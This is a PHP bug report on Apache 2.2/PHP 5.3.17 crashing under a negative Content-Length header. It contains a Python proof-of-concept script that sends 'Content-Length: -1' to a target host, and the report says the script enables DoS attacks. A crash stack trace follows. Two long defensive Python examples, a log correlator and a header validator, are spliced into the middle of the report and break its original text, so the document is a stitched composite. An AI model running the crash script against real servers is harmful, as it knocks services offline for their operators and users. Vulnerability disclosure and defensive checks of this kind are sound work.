From: chris at whyley dot com
Operating system: Windows Server 2003
PHP version: 5.3.17
Package: Reproducible crash
Bug Type: Bug
Bug description: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
Description:
------------
Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably crash by doing the following:

(1) Configure your Apache server to use a custom error handling page for the HTTP 413 error (Request entity too large) by inserting this line into your httpd.conf:

ErrorDocument 413 /error/

(2) Run the Python test script detailed below to send an HTTP GET request to the server with a negative integer for the HTTP "Content-Length" header and with the "Accept-Encoding" header set to "gzip, deflate".

When this is run, Apache crashes with the following error:

[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting.
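The two error_log lines above are the only server-side trace the report gives of the crash, and on their own they look like two unrelated events. As an added example (not part of the bug report, and not Apache or PHP code), the following Python 3 script correlates an "Invalid Content-Length" rejection with a child exiting with status 3221225477 (0xC0000005, the access violation named later in the report) inside an assumed 30-second window, so the crash can be alerted on and attributed to a client address. The sample log is constructed in the format the report quotes.

```python
"""Correlate Apache 2.2 error_log entries so that an "Invalid Content-Length"
rejection followed shortly by a worker child exiting with status 3221225477
(0xC0000005, an access violation) is raised as a single alert instead of two
unrelated log lines.  Added example written for this bug report; it is not
code from the report, from Apache or from PHP.  The sample log and the
30-second correlation window are constructed for the example."""
import re
from datetime import datetime, timedelta

# Apache 2.2 error_log line: [timestamp] [level] [client ip] message
_LINE = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} \d{2} \d{2}:\d{2}:\d{2} \d{4})\] "
    r"\[(?P<level>\w+)\] (?:\[client (?P<client>[^\]]+)\] )?(?P<msg>.*)$")
_CHILD_EXIT = re.compile(r"child process exited with status (?P<status>\d+)")

ACCESS_VIOLATION = 0xC0000005        # == 3221225477, the exit status in the report
WINDOW = timedelta(seconds=30)       # assumed: how far back to look for a trigger


def parse_line(line):
    """Return a dict with ts (datetime), level, client (may be None) and msg,
    or None for lines that are not in the error_log format."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%a %b %d %H:%M:%S %Y")
    return ev


def correlate(lines, window=WINDOW):
    """Walk the log in order and return one alert per access-violation crash,
    listing the clients whose invalid Content-Length was logged within
    `window` before it.  Rejections with no crash produce no alert."""
    pending = []          # (ts, client) of recent Invalid Content-Length events
    alerts = []
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue
        # Forget triggers that are already older than the window.
        pending = [(t, c) for t, c in pending if ev["ts"] - t <= window]
        if ev["msg"].startswith("Invalid Content-Length"):
            pending.append((ev["ts"], ev["client"] or "unknown"))
            continue
        m = _CHILD_EXIT.search(ev["msg"])
        if m and int(m.group("status")) == ACCESS_VIOLATION:
            alerts.append({
                "crash_at": ev["ts"],
                "status": "0x%08X" % ACCESS_VIOLATION,
                "suspects": sorted({c for _, c in pending}),
            })
            pending = []   # each crash is attributed once
    return alerts


# Constructed sample log in the format quoted by the report.  The 192.0.2.44
# rejection is five minutes before the crash and must not be blamed for it.
SAMPLE_LOG = """\
[Tue Oct 02 13:40:01 2012] [notice] Child 2040: Child process is running
[Tue Oct 02 13:41:10 2012] [error] [client 192.0.2.44] Invalid Content-Length
[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting.
[Tue Oct 02 13:46:25 2012] [notice] Child 3560: Child process is running
"""


def detect(text, window=WINDOW):
    """Convenience wrapper: correlate over a whole error_log given as one string."""
    return correlate(text.splitlines(), window)


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print("%s child exited with %s; invalid Content-Length seen from: %s"
              % (alert["crash_at"], alert["status"], ", ".join(alert["suspects"])))
```

The window is the only tunable: too short and a slow crash is missed, too long and unrelated rejections (which any malformed client can produce) get blamed for a crash they did not cause.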
This issue is a particular problem in the wild where many modern browsers aren't capable of handling file uploads over 2GB in size - instead of posting an accurate filesize for the Content-Length header they use a negative integer, causing the Apache server running PHP to crash. For further information on this see http://www.motobit.com/help/scptutl/pa98.htm

The script could be used to perform DoS attacks on vulnerable systems.
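The header value that triggers the problem is not valid HTTP at all: RFC 2616 and RFC 7230 both define Content-Length as one or more digits, so a sign can never be legitimate and a server can answer 400 before any handler or scripting engine sees the request. The following Python 3 example is added here (it is not code from the report, from Apache or from PHP) and shows that edge check, together with the conflicting-header and oversize (413) cases and, because the report attributes the negative values to browsers that mishandle uploads over 2GB, a helper showing how a size kept in a signed 32-bit integer wraps negative. The 2 GiB body cap, the host name and the sample requests are assumptions constructed for the example.

```python
"""Reject malformed Content-Length values at the edge, before a request
reaches an application handler.  Added example written for this bug report;
it is not code from the report, from Apache or from PHP.  The body-size cap
and the sample requests are constructed for the example."""
import re

# RFC 2616 14.13 / RFC 7230 3.3.2: Content-Length = 1*DIGIT.  A sign,
# whitespace inside the number or a decimal point makes the value invalid.
_DIGITS = re.compile(rb"^[0-9]+$")

# Assumed deployment cap on request bodies (2 GiB here, purely illustrative).
MAX_BODY_BYTES = 2 * 1024 ** 3


class BadRequest(Exception):
    """Syntactically invalid request head; answer 400."""


class PayloadTooLarge(Exception):
    """Well-formed but oversized body; answer 413."""


def validate_content_length(raw_value: bytes, limit: int = MAX_BODY_BYTES) -> int:
    """Return the declared length or raise.  Optional whitespace around the
    field value is allowed; "-1" is not 1*DIGIT and is rejected here instead
    of being handed to a signed-integer parser further down the stack."""
    value = raw_value.strip(b" \t")
    if not _DIGITS.match(value):
        raise BadRequest("Content-Length is not 1*DIGIT: %r" % raw_value)
    length = int(value)
    if length > limit:
        raise PayloadTooLarge("declared body of %d bytes exceeds %d" % (length, limit))
    return length


def decide_status(raw_request: bytes, limit: int = MAX_BODY_BYTES) -> int:
    """Parse a raw HTTP/1.1 request head (CRLF or bare LF line endings) and
    return the status to answer before dispatch; 200 means proceed."""
    head = raw_request.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0].rstrip(b"\n")
    lengths = set()
    for line in head.split(b"\n")[1:]:            # skip the request line
        name, sep, value = line.partition(b":")
        if not sep or name != name.strip():       # no colon, or whitespace around the name
            return 400
        if name.lower() == b"content-length":
            try:
                lengths.add(validate_content_length(value, limit))
            except PayloadTooLarge:
                return 413
            except BadRequest:
                return 400
    if len(lengths) > 1:
        return 400          # conflicting Content-Length fields are also a 400
    return 200


def wrap_to_int32(n: int) -> int:
    """What a client that keeps file sizes in a signed 32-bit integer ends up
    declaring for an n-byte body: two's-complement wrap turns anything at or
    above 2 GiB negative, which is one way a negative Content-Length arises."""
    n &= 0xFFFFFFFF
    return n - (1 << 32) if n & 0x80000000 else n


# Constructed sample requests; the first mirrors the shape of the report's script.
NEGATIVE_LENGTH = (b"GET / HTTP/1.1\nHost: example.test\n"
                   b"Accept-Encoding: gzip, deflate\nContent-Length: -1\n\n")
OVERSIZED = (b"POST /upload HTTP/1.1\r\nHost: example.test\r\n"
             b"Content-Length: 3221225472\r\n\r\n")
NORMAL = b"POST /upload HTTP/1.1\r\nHost: example.test\r\nContent-Length: 512 \r\n\r\n"
CONFLICTING = (b"POST /upload HTTP/1.1\r\nHost: example.test\r\n"
               b"Content-Length: 10\r\nContent-Length: 20\r\n\r\n")

if __name__ == "__main__":
    for label, req in [("negative", NEGATIVE_LENGTH), ("oversized", OVERSIZED),
                       ("normal", NORMAL), ("conflicting", CONFLICTING)]:
        print("%-11s -> %d" % (label, decide_status(req)))
    print("3 GiB seen through a signed int32:", wrap_to_int32(3 * 1024 ** 3))
```

The point of validating the syntax first is that the 413 path the report configures (ErrorDocument 413) is only ever reached for a number that parsed; a value that is not a number belongs to the 400 path and never needs a second handler invocation.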
Test script:
---------------
#!/usr/bin/python
import socket, sys
target = "10.211.55.3"
port = 80
request = "GET / HTTP/1.1\n"
request += "Host: "+target+"\n"
request += "Accept-Encoding: gzip, deflate\n"
request += "Content-Length: -1\n\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
except:
    print "[-] Connection to %s:%s failed!" % (target, port)
    sys.exit(0)
print "[+] Sending HTTP request. Check for crash on target."
s.send(request)
s.close()
Expected result:
----------------
Stable Apache, no crash.
Actual result:
--------------
Thread 2 - System ID 3008
Entry point msvcrt!_endthreadex+3a
Create time 10/2/2012 2:29:08 PM
Time spent in user mode 0 Days 0:0:0.0
Time spent in kernel mode 0 Days 0:0:0.15

Full Call Stack
Function  Arg 1  Arg 2  Arg 3  Arg 4  Source
php5ts!zend_hash_index_find+17 016f3460 0000000d 018ee6c0 00000000 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985
php5ts!_zend_list_delete+27 0000000d 016b0150 029811c0 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27
php5ts!_php_stream_free+ae 029811c0 00000003 016b0150 029811c0 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a
php5ts!php_zend_stream_mmap_closer+1a 029811c0 016b0150 0290a4e0 007339f4 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9
php5ts!zend_file_handle_dtor+2a 0290a4e8 016b0150 00000000 00000000 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8
php5ts!file_handle_dtor+14 0290a4e8 018ee828 018ee798 00000000 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b
php5ts!zend_llist_del_element+71 016b1754 018ee828 007d9810 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 + 36
php5ts!zend_destroy_file_handle+26 018ee828 016b0150 016b0150 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l @ 242
php5ts!zend_execute_scripts+c4 00000002 016b0150 00000000 00000001 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234
php5apache2_2!php_handler+64c 00fba200 006348e0 00fba200 00000000 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 671 + 13
libhttpd!ap_run_handler+25 00fba200 6eed3de0 00fba200 00634f68
libhttpd!ap_invoke_handler+b0 00000000 00fb8938 018ee8f8 6ff0ef68
libhttpd!ap_internal_redirect+37 00634f68 00fb8938 00eb6c50 0000019d
libhttpd!ap_die+1e8 00fb8938 00000000 00000001 00fba118
libhttpd!ap_http_header_filter+9f 00fb96f8 00fba118 00fba118 018ee974
libhttpd!ap_pass_brigade+52 00fb96f8 00fba118 00000000 00fba118
libhttpd!ap_content_length_filter+a9 00fb96e0 00eb6cb0 00fb96c8 018ee9e0
libhttpd!ap_pass_brigade+52 00fb96e0 00fba118 6fba4309 00fba118
libhttpd!ap_byterange_filter+474 00fb96c8 00fba118 00fba060 018eea1c
libhttpd!ap_pass_brigade+52 00fb96c8 00fba118 00eb6cb0 00fba118
mod_deflate+1352 00fba060 00fba118 00fba0c0 018eea58
libhttpd!ap_pass_brigade+52 00fba060 00fba118 00fba080 00fba190
mod_deflate+1aa1 00fc5a48 00fba1b0 00fba190 018eea84
libhttpd!ap_pass_brigade+52 00fc5a48 00fba190 00fb9938 00fba190
libhttpd!ap_old_write_filter+5b 00fba080 00fba190 00fba190 018eeab4
libhttpd!ap_pass_brigade+52 00fba080 00fba190 00fb9878 00fba138
libhttpd!ap_set_etag+b28 00fba138 00fb9938 0000019d 6ff37324
libhttpd!ap_set_etag+2bb 00fba190 00fb9e08 00000000 00000000
libhttpd!ap_get_brigade+24 00fb9938 00fb9e08 00000000 00000000
php5apache2_2!php_apache_sapi_read_post+3d 018eeb68 00000f9f 00000f9f 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 201 + 1a
php5ts!sapi_deactivate+6f 016b0150 016b0150 00000000 00fb8938 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\sapi.c @ 423 + d
php5ts!php_request_shutdown+3a6 00000000 00000004 00637170 00fb8938 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1670 + 6
php5apache2_2!php_handler+6b1 00fb8938 006348e0 00fb8938 00000000 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 682
libhttpd!ap_run_handler+25 00fb8938 00fb8938 00fb8938 00000000
libhttpd!ap_invoke_handler+b0 00000000 00fb7958 018eff38 6ff0adbc
libhttpd!ap_die+29e 00fb8938 00000000 006535b0 00fb7958
libhttpd!ap_get_request_note+1d0c 00fb7958 00fb7958 00fb7958 00000001
libhttpd!ap_run_process_connection+25 00fb7958 005c4488 018eff80 6ff1df6c
libhttpd!ap_process_connection+33 00fb7958 00eb49f8 7c911086 00eb0448
libhttpd!ap_regkey_value_remove+c7c 00fb7950 7c911086 7c9101db 00ea2120
msvcrt!_endthreadex+a9 00ea2120 7c911086 7c9101db 00ea2120
kernel32!BaseThreadStart+37 77c3a341 00ea2120 00000000 00000000

Exception Information
PHP5TS!ZEND_HASH_INDEX_FIND+17
In httpd__PID__3560__Date__10_02_2012__Time_02_29_32PM__453__Second_Chance_Exception_C0000005.dmp the assembly instruction at php5ts!zend_hash_index_find+17 in C:\Core\PHP-5317\php5ts.dll from The PHP Group has caused an access violation exception (0xC0000005) when trying to read from memory location 0x0d3e2d2d on thread 2
--
Edit bug report at https://bugs.php.net/bug.php?id=63200&edit=1